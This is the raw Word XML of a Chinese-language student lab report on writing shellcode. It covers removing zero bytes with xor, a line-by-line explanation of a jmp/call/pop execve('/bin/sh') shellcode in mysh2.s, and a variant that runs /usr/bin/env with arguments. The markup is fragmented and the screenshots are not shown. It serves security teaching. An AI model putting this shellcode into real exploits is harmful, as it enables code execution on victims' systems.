        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00106D55" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008F1F81" w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：消除代码中的0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2B80B" w14:textId="572A901D" w:rsidR="00A73E1C" w:rsidRDefault="00A73E1C" w:rsidP="00A73E1C">
      <w:pPr>
        <w:pStyle w:val="a4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解释为什么</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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会有效的将0分配给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，并且不会在机器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E506A" w14:textId="40809E48" w:rsidR="00BA759C" w:rsidRDefault="00A73E1C" w:rsidP="00A73E1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="560" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码中获得一个0？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A73E1C">
        <w:t>move 指令为5个字节，会将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73E1C">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73E1C">
        <w:t>后续的机器码中获得0，而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73E1C">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73E1C">
        <w:t>指 令为2个字节，机器码中不会有多余的0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F313947" w14:textId="19EC8E15" w:rsidR="00A73E1C" w:rsidRDefault="00A73E1C" w:rsidP="00A73E1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修改</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，用小端的方法，把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丢弃，h压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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00660F52" w:rsidRPr="00660F52">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2313812A" wp14:editId="3E4EF150">
            <wp:extent cx="4352957" cy="1638312"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1424992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92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57" cy="163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A2B9" w14:textId="13F9B0B7" w:rsidR="00945BBA" w:rsidRDefault="00945BBA" w:rsidP="00A73E1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编译链接并执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00945BBA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFD0743" wp14:editId="420C8AAE">
            <wp:extent cx="5010187" cy="666755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1876979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792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87" cy="6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5B9B" w14:textId="19C16006" w:rsidR="00945BBA" w:rsidRDefault="00945BBA" w:rsidP="00A73E1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查看机器码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00106D55" w:rsidRPr="00106D55">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8D76A9" wp14:editId="100DF8E1">
            <wp:extent cx="4972086" cy="3095648"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="879640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8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86" cy="30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3BE2" w14:textId="4F2830FB" w:rsidR="008F1F81" w:rsidRPr="00CC3247" w:rsidRDefault="008F1F81" w:rsidP="008F1F81">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.c：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB61E4" w14:textId="1337CF08" w:rsidR="008F1F81" w:rsidRDefault="00C1070E" w:rsidP="008F1F81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修改</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysh.s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码如下</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EA070C" w:rsidRPr="00EA070C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0E0EF7" wp14:editId="39610840">
            <wp:extent cx="4029104" cy="4448208"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1279103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039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104" cy="44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BE54" w14:textId="45BE686B" w:rsidR="00EA070C" w:rsidRDefault="00EA070C" w:rsidP="008F1F81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编译运行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008E1889" w:rsidRPr="008E1889">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B8B786" wp14:editId="2D6563AD">
            <wp:extent cx="4791110" cy="2781320"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="280849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493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110" cy="27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53D5" w14:textId="379BAB60" w:rsidR="008E1889" w:rsidRDefault="008E1889" w:rsidP="008F1F81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查看机器码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00731C1D" w:rsidRPr="00731C1D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0A4FF3" wp14:editId="28AA0175">
            <wp:extent cx="4838735" cy="4248181"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1969470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708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35" cy="424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CE58" w14:textId="6ED47096" w:rsidR="00731C1D" w:rsidRPr="00CC3247" w:rsidRDefault="00731C1D" w:rsidP="00731C1D">
      <w:pPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任务二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4347E7AE" w14:textId="77777777" w:rsidR="00EE6419" w:rsidRDefault="00731C1D" w:rsidP="00EE6419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解释mysh2.s代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D2311" w14:textId="08CD33C6" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217251C" w14:textId="77777777" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  global _start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF76628" w14:textId="13622E34" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    _start:</w:t>
      </w:r>
      <w:r w:rsidR="00C904E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16F534" w14:textId="405145ED" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>BITS 32</w:t>
      </w:r>
      <w:r w:rsidR="00DF500E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">             指定NASM产生的代码被运行在32位模式处理器下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9C2A8" w14:textId="3D44BF13" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="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jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> short two</w:t>
      </w:r>
      <w:r w:rsidR="00DF500E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        跳转到two位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D56B0" w14:textId="77777777" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C33657F" w14:textId="0DE96563" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF500E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将堆栈中一个字节弹出到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这里是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC97E84" w14:textId="3A9CBC17" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0795CD" w14:textId="0B732A7F" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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>mov [ebx+7], al</w:t>
      </w:r>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      将al（就是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的低八位）的数据传送给地址ebx+7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A9917" w14:textId="17F0C9D5" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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mov [ebx+8], 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</w:t>
      </w:r>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D572EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC7CED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据传送给地址ebx+8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FC300" w14:textId="44416600" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200"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ab/>
        <w:t xml:space="preserve">mov [ebx+12], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC7CED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC7CED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC7CED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据传给地址ebx+12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2208A0F5" w14:textId="4B35123E" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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lea </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, [ebx+8] </w:t>
      </w:r>
      <w:r w:rsidR="008B58E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>将ebx+8 的有效地址传送给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4013A0B2" w14:textId="1D69910D" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t xml:space="preserve"> 异或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08AC03" w14:textId="09B482A4" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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>mov al,  0x0b</w:t>
      </w:r>
      <w:r w:rsidR="00677441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>将 0x0b 传送给al(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t xml:space="preserve"> 的低8 位)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBBB12" w14:textId="77777777" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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>int 0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54045C0F" w14:textId="77777777" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C7FF8" w14:textId="16546237" w:rsidR="00EE6419" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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>call one</w:t>
      </w:r>
      <w:r w:rsidR="00677441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t xml:space="preserve">先将 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t xml:space="preserve"> 语句的IP压入</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>中，再使当前的IP+16位位移，再跳转到one处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24471B92" w14:textId="4F45D0FD" w:rsidR="00731C1D" w:rsidRDefault="00EE6419" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="20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/bin/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*AAAABBBB'</w:t>
      </w:r>
      <w:r w:rsidR="00677441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00677441" w:rsidRPr="00677441">
        <w:t>定义指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED23124" w14:textId="77777777" w:rsidR="009257B7" w:rsidRDefault="009257B7" w:rsidP="00EE6419">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5839B106" w14:textId="338905A9" w:rsidR="009257B7" w:rsidRDefault="009257B7" w:rsidP="009257B7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编译运行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009257B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AAAE283" wp14:editId="78C08551">
            <wp:extent cx="4876836" cy="1676412"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1438850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502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36" cy="16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27D2" w14:textId="1D899723" w:rsidR="009257B7" w:rsidRDefault="009257B7" w:rsidP="009257B7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为什么代码能成功</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009257B7">
        <w:t>mov[ebx+7],al，将*替换为0x00，mov[ebx+8],</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>，将 AAAA 替换 为</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t xml:space="preserve">的地址，将BBBB替换为“0”；lea </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t xml:space="preserve">, [ebx+8]； </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t xml:space="preserve"> 此时为[“/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009257B7">
        <w:t>”]，所以可以执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DACB54" w14:textId="7E650260" w:rsidR="00154D8F" w:rsidRDefault="009257B7" w:rsidP="00154D8F">
      <w:pPr>
        <w:pStyle w:val="a4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修改代码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00154D8F" w:rsidRPr="00154D8F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212ADC64" wp14:editId="015758A8">
            <wp:extent cx="5274310" cy="4270375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="559359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594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D8F">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00154D8F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终，修改后的mysh2.s可用c语言总结为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC50C7F" w14:textId="39B7966B" w:rsidR="00154D8F" w:rsidRPr="00154D8F" w:rsidRDefault="00154D8F" w:rsidP="00154D8F">
      <w:pPr>
        <w:ind w:left="200" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        char *command[] = {"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/env", "-"， "a=11", "b=22" NULL};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131152FE" w14:textId="017D5C40" w:rsidR="009257B7" w:rsidRDefault="00154D8F" w:rsidP="00154D8F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="560" w:firstLineChars="0" w:firstLine="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xecv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command[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0], command, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B17C8" w14:textId="380EE424" w:rsidR="00154D8F" w:rsidRDefault="00154D8F" w:rsidP="009257B7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编译并执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00154D8F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E52FF36" wp14:editId="4115950E">
            <wp:extent cx="4943511" cy="1771663"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="885376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763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511" cy="17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E68C" w14:textId="77777777" w:rsidR="00230522" w:rsidRDefault="00230522" w:rsidP="00230522">
      <w:pPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597B6147" w14:textId="77EA2A26" w:rsidR="00230522" w:rsidRPr="00CC3247" w:rsidRDefault="00230522" w:rsidP="00230522">
      <w:pPr>
